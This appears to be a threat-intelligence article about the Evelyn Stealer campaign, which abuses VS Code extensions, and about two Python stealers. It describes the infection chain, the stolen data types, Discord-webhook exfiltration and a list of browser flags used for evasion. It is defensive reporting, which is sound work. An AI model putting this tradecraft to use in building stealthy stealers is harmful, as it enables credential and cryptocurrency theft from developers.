CodeSteal: VS Code Extension Hijacking for Crypto and Credential Theft

Key Takeaways:

• A new malware campaign, Evelyn Stealer, is targeting software developers by exploiting the Microsoft Visual Studio Code (VS Code) extension ecosystem.
• The malware is designed to steal sensitive information, including developer credentials, cryptocurrency-related data, and other sensitive information.
• The campaign targets organizations with software development teams that rely on VS Code and third-party extensions.
• The malware can also be used to gain access to broader organizational systems, including production systems, cloud resources, and digital assets.
• Two new Python-based stealer malware families, MonetaStealer and SolyxImmortal, have also been discovered, with the former capable of targeting Apple macOS systems.

Introduction to Evelyn Stealer
The Evelyn Stealer malware campaign is a newly discovered threat that targets software developers by exploiting the VS Code extension ecosystem. This campaign is designed to steal sensitive information, including developer credentials, cryptocurrency-related data, and other sensitive information. The malware is capable of compromising developer environments, which can then be used as access points to broader organizational systems, including production systems, cloud resources, and digital assets. This campaign highlights the increasing importance of securing developer environments and the need for organizations to take proactive measures to protect themselves against such threats.

Technical Details of Evelyn Stealer
The Evelyn Stealer malware is designed to be stealthy and evasive, using a variety of techniques to avoid detection. The malware is distributed through compromised VS Code extensions, which are then used to launch a malicious downloader DLL. This DLL launches a hidden PowerShell command to fetch and execute a second-stage payload, which decrypts and injects the main stealer payload into a legitimate Windows process. The malware then collects sensitive information, including clipboard content, installed apps, cryptocurrency wallets, running processes, desktop screenshots, stored Wi-Fi credentials, and system information. The malware also collects credentials and stored cookies from Google Chrome and Microsoft Edge, and implements safeguards to detect analysis and virtual environments.

Evasion Techniques Used by Evelyn Stealer
The Evelyn Stealer malware uses a variety of evasion techniques to avoid detection. The malware launches the browser via the command line, using flags such as –headless=new, –disable-gpu, –no-sandbox, –disable-extensions, –disable-logging, –silent-launch, –no-first-run, –disable-popup-blocking, –window-position=-10000,-10000, and –window-size=1,1. These flags allow the malware to run in headless mode, prevent GPU acceleration, disable browser security sandbox, prevent legitimate security extensions from interfering, disable browser log generation, suppress startup notifications, bypass initial setup dialogs, ensure malicious content can execute, and position the window off-screen. The malware also creates a mutual exclusion (mutex) object to ensure that only one instance of the malware can run at any given time, preventing multiple instances of the malware from being executed on a compromised host.

Other Malware Campaigns
In addition to the Evelyn Stealer campaign, two new Python-based stealer malware families, MonetaStealer and SolyxImmortal, have been discovered. MonetaStealer is capable of targeting Apple macOS systems, enabling comprehensive data theft. SolyxImmortal, on the other hand, leverages legitimate system APIs and widely available third-party libraries to extract sensitive user data and exfiltrate it to attacker-controlled Discord webhooks. The design of SolyxImmortal emphasizes stealth, reliability, and long-term access, rather than rapid execution or destructive behavior. By operating entirely in user space and relying on trusted platforms for command-and-control, the malware reduces its likelihood of immediate detection while maintaining persistent visibility into user activity.

Conclusion and Recommendations
The discovery of the Evelyn Stealer campaign and the emergence of new stealer malware families highlight the increasing importance of securing developer environments and protecting against such threats. Organizations should take proactive measures to protect themselves, including implementing robust security controls, monitoring developer environments for suspicious activity, and educating developers about the risks of malware and the importance of secure coding practices. Additionally, organizations should consider implementing measures to detect and prevent the use of compromised VS Code extensions, and to monitor for signs of malware activity. By taking these steps, organizations can reduce the risk of compromise and protect their sensitive information from theft.